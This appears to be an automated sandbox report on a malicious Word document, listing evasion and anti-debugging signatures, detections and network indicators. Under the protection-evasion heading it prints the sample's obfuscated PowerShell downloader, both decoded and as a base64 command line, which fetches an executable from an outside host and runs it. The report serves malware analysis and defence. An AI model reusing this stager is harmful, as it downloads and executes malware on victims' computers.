Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Contains long sleeps (>= 3 min)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick LaunchJump to behavior
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2512Thread sleep time: -922337203685477s >= -30000sJump to behavior
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: Request1.docBinary or memory string: WFjAHgfss4/wRFiAs7j3WMJgeyyiQE3HuiYAOcIizASSsLOBjGERICSQiIiQklYAA8JgYxgYWUWI
Source: Request1.docBinary or memory string: cbqeZsswa6JhYQXhx4IGMkHwR38ZXayz18lPUTMoap8NO4tmkEDi2MjuHHHBHkHGFs7RdwpKjR8G
Queries a list of all running processesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSystem information queried: KernelDebuggerInformationJump to behavior
Enables debug privilegesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Creates guard pages, often used to prevent reverse engineering and debuggingShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Encrypted powershell cmdline option foundShow sources
Source: unknownProcess created: Base64 decoded $h5__9__9=('E0'+'08_4'+'8');$F_459_=new-object Net.WebClient;$u5__7_51=('http://d'+'qfk'+'32.c'+'ompa'+'ny/iwp01'+'-'+'2k'+'sm/209'+'1'+'8201.ph'+'p?l='+'uk'+'otz1'+'0.sap').Split('@');$A63_80=('h4_'+'1060');$N_76277 = ('1'+'63');$J__7__3=('i7_39'+'4'+'7_');$b38_59__=$env:userprofile+'\'+$N_76277+('.'+'exe');foreach($h_8120 in $u5__7_51){try{$F_459_.DownloadFile($h_8120, $b38_59__);$j86_546=('X5'+'_6'+'3_5');If ((Get-Item $b38_59__).length -ge 40000) {Invoke-Item $b38_59__;$i65830=('t'+'23_'+'40');br
Very long cmdline option found, this is very uncommon (may be encrypted or packed)Show sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powersHeLl -e JABoADUAXwBfADkAXwBfADkAPQAoACcARQAwACcAKwAnADAAOABfADQAJwArACcAOAAnACkAOwAkAEYAXwA0ADUAOQBfAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAHUANQBfAF8ANwBfADUAMQA9ACgAJwBoAHQAdABwADoALwAvAGQAJwArACcAcQBmAGsAJwArACcAMwAyAC4AYwAnACsAJwBvAG0AcABhACcAKwAnAG4AeQAvAGkAdwBwADAAMQAnACsAJwAtACcAKwAnADIAawAnACsAJwBzAG0ALwAyADAAOQAnACsAJwAxACcAKwAnADgAMgAwADEALgBwAGgAJwArACcAcAA/AGwAPQAnACsAJwB1AGsAJwArACcAbwB0AHoAMQAnACsAJwAwAC4AcwBhAHAAJwApAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQAQQA2ADMAXwA4ADAAPQAoACcAaAA0AF8AJwArACcAMQAwADYAMAAnACkAOwAkAE4AXwA3ADYAMgA3ADcAIAA9ACAAKAAnADEAJwArACcANgAzACcAKQA7ACQASgBfAF8ANwBfAF8AMwA9ACgAJwBpADcAXwAzADkAJwArACcANAAnACsAJwA3AF8AJwApADsAJABiADMAOABfADUAOQBfAF8APQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAE4AXwA3ADYAMgA3ADcAKwAoACcALgAnACsAJwBlAHgAZQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABoAF8AOAAxADIAMAAgAGkAbgAgACQAdQA1AF8AXwA3AF8ANQAxACkAewB0AHIAeQB7ACQARgBfADQANQA5AF8ALgBEAG8AdwBuAGwAb

Language, Device and Operating System Detection:

barindex
Queries the installation date of WindowsShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behaviorgraph top1 signatures2 2 Behavior Graph ID: 113893 Sample: Request1.doc Startdate: 01/03/2019 Architecture: WINDOWS Score: 80 13 Antivirus detection for URL or domain 2->13 15 Multi AV Scanner detection for submitted file 2->15 17 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->17 19 3 other signatures 2->19 5 powershell.exe 12 7 2->5         started        9 WINWORD.EXE 9 27 2->9         started        process3 dnsIp4 11 dqfk32.company 95.142.47.75, 49220, 80 unknown Russian Federation 5->11 21 Powershell connects to network 5->21 signatures5

Simulations

Behavior and APIs

TimeTypeDescription
16:25:49API Interceptor67x Sleep call for process: WINWORD.EXE modified
16:25:49API Interceptor1x Sleep call for process: powershell.exe modified

Antivirus Detection

Initial Sample

SourceDetectionScannerLabelLink
Request1.doc18%virustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLinkDownload
dqfk32.company3%virustotalBrowseDownload File

URLs

SourceDetectionScannerLabelLinkDownload
http://dqfk32.compa0%Avira URL CloudsafeDownload File
http://dqfk32.company/iwp01-2ksm/20918201.php?l=0%Avira URL CloudsafeDownload File
http://dqfk32.company/iwp01-2k0%Avira URL CloudsafeDownload File
http://dqfk32.company/iwp01-2ksm/20918201.php?l=ukotz10.sap100%Avira URL CloudmalwareDownload File
http://dqfk32.c0%Avira URL CloudsafeDownload File
http://dqfk32.companyx&0%Avira URL CloudsafeDownload File
http://dqfk32.company/iwp01-2ksm/20918201.ph0%Avira URL CloudsafeDownload File
http://dqfk32.company3%virustotalBrowseDownload File
http://dqfk32.company0%Avira URL CloudsafeDownload File
http://dqfk32.company/iwp01-0%Avira URL CloudsafeDownload File
http://dqfk32.company/iwp010%Avira URL CloudsafeDownload File
http://dqfk32.company/iwp01-2ksm/2090%Avira URL CloudsafeDownload File
http://dqfk32.company/iwp01-2ksm/20918201.php?l=ukotz10%Avira URL CloudsafeDownload File
http://dqfk32.company/iwp01-2ksm/20913%virustotalBrowseDownload File
http://dqfk32.company/iwp01-2ksm/20910%Avira URL CloudsafeDownload File
http://dqfk32.company/iwp01-2ksm/20918201.php?l=uk0%Avira URL CloudsafeDownload File

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

SourceRuleDescriptionAuthor
00000001.00000000.1987665109.00010000.00000004.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
00000001.00000002.2000179213.00330000.00000004.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
00000001.00000002.1999709173.00040000.00000002.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
00000001.00000002.1999675204.00020000.00000004.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
00000001.00000002.2000624453.01280000.00000004.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
00000001.00000003.1988004621.00010000.00000004.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
00000001.00000002.2000073133.00150000.00000004.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
unknownrequest.docGet hashmaliciousBrowse
  • 192.168.0.44
FERK444259.docGet hashmaliciousBrowse
  • 192.168.0.44
b392e93a5753601db564e6f2dc6a945aac3861bc31e2c1e5e7f3cd4e5bb150a4.jsGet hashmaliciousBrowse
  • 192.168.0.40
Setup.exeGet hashmaliciousBrowse
  • 192.168.0.40
base64.pdfGet hashmaliciousBrowse
  • 192.168.0.40
file.pdfGet hashmaliciousBrowse
  • 192.168.0.40
Spread sheet 2.pdfGet hashmaliciousBrowse
  • 192.168.0.40
request_08.30.docGet hashmaliciousBrowse
  • 192.168.0.44
P_2038402.xlsxGet hashmaliciousBrowse
  • 192.168.0.44
48b1cf747a678641566cd1778777ca72.apkGet hashmaliciousBrowse
  • 192.168.0.22
seu nome na lista de favorecidos.exeGet hashmaliciousBrowse
  • 192.168.0.40
Adm_Boleto.via2.comGet hashmaliciousBrowse
  • 192.168.0.40
QuitacaoVotorantim345309.exeGet hashmaliciousBrowse
  • 192.168.0.40
pptxb.pdfGet hashmaliciousBrowse
  • 192.168.0.40

JA3 Fingerprints

No context

Dropped Files

No context

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.